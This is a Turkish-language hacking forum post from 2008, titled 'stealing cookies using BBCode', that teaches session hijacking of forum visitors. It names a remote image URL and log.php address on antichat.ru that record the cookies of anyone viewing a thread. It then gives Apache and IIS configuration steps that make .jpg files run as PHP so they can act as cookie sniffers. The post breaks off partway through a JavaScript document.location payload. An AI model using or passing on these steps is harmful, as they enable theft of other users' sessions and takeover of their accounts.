By P@Ss
Süper Moderatör
| İş/Hobiler : İnternet ::) |
|
İtibar
Rep Puanı, vb.:
    (1000/999)
İtibar:
(100/100) |
|
|
 Konu: BBCode kullanarak Cookie çalmak  Çarş. Ekim 29, 2008 4:00 pm |
|
|
Uzun bir süre aranızda yokum dönüşüm muhteşem olucak: inş hacked yapma zmanının geldiğini düşünüyorum.o yuzden siteye fazla vakit ayıramıcam nese gimeden son bi konu acıyım dedim
Cookiler web sayfanızı ziyaret eden ziyaretçilere sonraki girişlerinde tanımak için bırakılan metin dosyalarıdır.Bu dosyalardaki bilgiler XSS saldırıları ile çalınabilinir ve o siteye sizin kullanıcı adınız ile cookie sayesinde oturum açabilirler.
Bazı portal ve forumlarda forumda kodu kullanılarakta cookie çalınabilmektedir.
Foruma mesaj atarken IMG tag ı içine http://antichat.ru/cgi-bin/s.jpg bu resmi çağırırsanız o konuya giren herkesin cookie bilgisi http://antichat.ru/sniff/log.php adresinde loglanıcaktır.
Peki gelelim http://antichat.ru/cgi-bin/s.jpg nin nasıl cookie çaldığına burda jpg içine kod filan ekledikleri yok.Yapılan çok basit birşey tabi bunu daha önce apache server veya IIS kurduysanız anlarsınız.
Serverınızda apache veya IIS kurulu ise yapmanız gerekenler
Apache için
Apache kurduğunuz klasore girip ordan conf klasorune httpd isimli dosyayı açıp AddType application/x-httpd-php3 .phtml .php3 .php satırını bularak sonuna .jpg eklemek.Burada php yi temsil edecek uzantıları seçiyorsunuz ve .jpg uzantısınıda php emrine vermiş oluyorsunuz
IIS de bu işlemi
Başlat/çalıştır/regedit e girerek HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/W3SVC/Parameters/ScriptMap bölümüne girip düzen menüsünden yeni dize değerine tıklayın daha sonra yeni değer e çift tıklayıp .jpg yazın işte IIS de de jpg uzantıyı php emrine vermiş olduk.
Daha sonra yapmanız gerekenler Yeni bir metin belgesi açıp içine
document.location=& |
|
